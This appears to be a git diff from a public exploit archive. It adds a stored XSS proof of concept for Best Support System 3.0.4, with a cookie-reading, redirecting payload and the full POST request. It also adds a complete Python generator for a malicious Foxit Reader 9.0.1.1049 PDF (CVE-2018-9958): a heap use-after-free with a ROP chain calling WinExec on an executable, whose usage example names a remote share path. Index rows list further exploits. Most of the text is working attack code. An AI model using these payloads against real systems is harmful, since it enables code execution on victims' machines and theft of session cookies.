+An Authenticated Persistent XSS vulnerability was discovered in the
+Best Support System, tested version — v3.0.4.
+
+
+[$] :: Payloads:
+
+13"-->">'` -- `<!--<img src="--><img src=x
+onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>
+
+
+[!] :: PoC (Burp Suite POST request):
+
+POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
+Host: localhost
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 350
+Origin: https://localhost
+Connection: close
+Referer: https://localhost/support-system/ticket/details/11.html
+Cookie: [cookies_here]
+
+app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2
\ No newline at end of file
diff --git a/exploits/windows/local/49116.py b/exploits/windows/local/49116.py
new file mode 100755
index 000000000..77ce33d1d
--- /dev/null
+++ b/exploits/windows/local/49116.py
@@ -0,0 +1,273 @@
+# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
+# Date: August 29, 2020
+# Exploit Author: CrossWire
+# Vendor Homepage: https://www.foxitsoftware.com/
+# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
+# Version: 9.0.1.1049
+# Tested on: Microsoft Windows Server 2016 10.0.14393
+# CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958)
+
+#!/usr/bin/python3
+
+'''
+===========================================================================
+|   PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958)  |  
+===========================================================================
+| Written by: Kevin Dorland (CrossWire)                                   |
+| Date: 08/29/2020                                                        |
+|                                                                         |
+| Exploit originally discovered by Steven Seeley (mr_me) of Source Incite |
+|                                                                         |
+| References:                                                             |
+|   https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) |
+|   https://www.exploit-db.com/exploits/45269 (Metasploit adaptation)     |
+|                                                                         |
+===========================================================================
+'''
+
+
+PDF_TEMPLATE = '''
+%PDF
+1 0 obj
+<</Pages 1 0 R /OpenAction 2 0 R>>
+2 0 obj
+<</S /JavaScript /JS (
+
+var heap_ptr   = 0;
+var foxit_base = 0;
+var pwn_array  = [];
+
+function prepare_heap(size){
+    var arr = new Array(size);
+    for(var i = 0; i < size; i++){
+        arr[i] = this.addAnnot({type: "Text"});;
+        if (typeof arr[i] == "object"){
+            arr[i].destroy();
+        }
+    }
+}
+
+function gc() {
+    const maxMallocBytes = 128 * 0x100000;
+    for (var i = 0; i < 3; i++) {
+        var x = new ArrayBuffer(maxMallocBytes);
+    }
+}
+
+function alloc_at_leak(){
+    for (var i = 0; i < 0x64; i++){
+        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
+    }
+}
+
+function control_memory(){
+    for (var i = 0; i < 0x64; i++){
+        for (var j = 0; j < pwn_array[i].length; j++){
+            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
+        }
+    }
+}
+
+function leak_vtable(){
+    var a = this.addAnnot({type: "Text"});
+
+    a.destroy();
+    gc();
+
+    prepare_heap(0x400);
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    var leaked = stolen[0] & 0xffff0000;
+    foxit_base = leaked - 0x01f50000;
+}
+
+function leak_heap_chunk(){
+    var a = this.addAnnot({type: "Text"});
+    a.destroy();
+    prepare_heap(0x400);
+
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    alloc_at_leak();
+    heap_ptr = stolen[1];
+}
+
+function reclaim(){
+    var arr = new Array(0x10);
+    for (var i = 0; i < arr.length; i++) {
+        arr[i] = new ArrayBuffer(0x60);
+        var rop = new Int32Array(arr[i]);
+
+        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
+        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
+        rop[0x02] = 0x72727272;              // junk
+        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
+        rop[0x04] = 0xffffffff;              // ret of WinExec
+        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
+        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
+        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
+        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
+        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
+        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
+        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
+        
+        //Path to executable
+
+<PATH TO EXECUTABLE>
+        
+        //End Path to executable
+
+        rop[0x17] = 0x00000000;              // adios, amigo
+    }
+}
+
+function trigger_uaf(){
+    var that = this;
+    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
+    var arr = [1];
+    Object.defineProperties(arr,{
+        "0":{
+            get: function () {
+
+                that.getAnnot(0, "uaf").destroy();
+
+                reclaim();
+                return 1;
+            }
+        }
+    });
+
+    a.point = arr;
+}
+
+function main(){
+    leak_heap_chunk();
+    leak_vtable();
+    control_memory();
+    trigger_uaf();
+}
+
+if (app.platform == "WIN"){
+    if (app.isFoxit == "Foxit Reader"){
+        if (app.appFoxitVersion == "9.0.1.1049"){
+            main();
+        }
+    }
+}
+
+)>> trailer <</Root 1 0 R>>
+'''
+
+import sys
+
+#Enforces 2 hex char byte notation. "0" becomes "0x00"
+def format_byte(b):
+
+    if (len(b) > 2) and (b[0:2] == '0x'):
+        b = b[2:]
+
+    if len(b) == 1:
+        b = '0' + b
+
+    return '0x' + b
+
+def char2hex(c):
+    return format_byte(hex(ord(c)))
+
+#Converts file path into array of eleven 32-bit hex words
+def path_to_machine_code(path,little_endian = True):
+
+    print("[+] Encoding Path:",path)
+
+    #ensure length
+    if len(path) > 44:
+        print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!")
+        exit(-1)
+
+    #Copy path into 4 character (32 bit) words (max 11)
+    word_array = []
+    for i in range(11):
+        
+        word = ''
+
+        if len(path):
+            word += path[0:4] if len(path) >= 4 else path
+            path = path[len(word):]
+        
+        if len(word) < 4:
+            word += chr(0) * (4 - len(word))
+
+        word_array.append(word)
+
+    #Convert chars to hex values and format to "0xAABBCCDD" notation
+    hex_array = []
+    for word in word_array:
+            
+        #Reverse byte order to fit little endian standard
+        if(little_endian): word = word[::-1]
+
+        #Write bytes to hex strings
+        hex_string = '0x'
+        for char in word:
+            hex_string += char2hex(char)[2:] #strip the 0x off the byte here
+
+        hex_array.append(hex_string)
+   
+    return hex_array
+
+#writes encoded path to rop array to match template
+def create_rop(hex_arr, start_index = '0c'):
+
+    ord_array = []
+
+    index = int(start_index,16)
+
+    for instruction in hex_arr:
+
+        full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};"
+
+        ord_array.append(full_instruction)
+    
+        index += 1
+
+    return ('\n'.join(ord_array))
+    
+    
+
+if __name__ == '__main__':
+    
+    if len(sys.argv) != 3:
+        print(f"USAGE: {sys.argv[0]} <path to executable> <pdf filename>")
+        print("-- EXAMPLES --")
+        print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf")
+
+        exit(-1)
+
+    #Parse user args
+    EXE_PATH = sys.argv[1] 
+    PDF_PATH = sys.argv[2]
+
+    #Generate hex
+    raw_hex = path_to_machine_code(EXE_PATH)
+
+    print("[+] Machine Code:")
+    for hex_word in raw_hex:
+        print(hex_word)
+
+    ord_string = create_rop(raw_hex)
+
+    print("[+] Instructions to add:")
+    print(ord_string)
+
+    print("[+] Generating pdf...")
+
+    print("\t- Filling template...")
+    evil_pdf = PDF_TEMPLATE.replace('<PATH TO EXECUTABLE>',ord_string)
+    
+    print("\t- Writing file...")
+    with open(PDF_PATH,'w') as fd:
+        fd.write(evil_pdf)
+
+    print("[+] Generated pdf:",PDF_PATH)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index efd412bf0..0d8798fae 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6762,6 +6762,7 @@ id,file,description,date,author,type,platform,port
 48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
 49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
 49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
+49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11208,6 +11209,8 @@ id,file,description,date,author,type,platform,port
 49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,
 49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows,
 49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
+49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,
+49116,exploits/windows/local/49116.py,"Foxit Reader 9.0.1.1049 - Arbitrary Code Execution",2020-11-27,CrossWire,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43332,3 +43335,13 @@ id,file,description,date,author,type,platform,port
 49102,exploits/php/webapps/49102.txt,"WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting",2020-11-25,"Mayur Parmar",webapps,php,
 49103,exploits/php/webapps/49103.txt,"osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting",2020-11-25,"Emre Aslan",webapps,php,
 49104,exploits/windows/webapps/49104.py,"SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow",2020-11-25,"Abdessalam king",webapps,windows,
+49107,exploits/php/webapps/49107.txt,"Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting",2020-11-27,"Ilca Lucian Florin",webapps,php,
+49109,exploits/php/webapps/49109.txt,"WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting",2020-11-27,"Sun* Cyber Security Research Team",webapps,php,
+49110,exploits/hardware/webapps/49110.py,"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution",2020-11-27,"Emre SUREN",webapps,hardware,
+49112,exploits/php/webapps/49112.py,"Laravel Administrator 4 - Unrestricted File Upload (Authenticated)",2020-11-27,"Xavi Beltran",webapps,php,
+49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple,
+49114,exploits/php/webapps/49114.txt,"Moodle 3.8 - Unrestricted File Upload",2020-11-27,"Sirwan Veisi",webapps,php,
+49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,
+49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
+49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
+49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,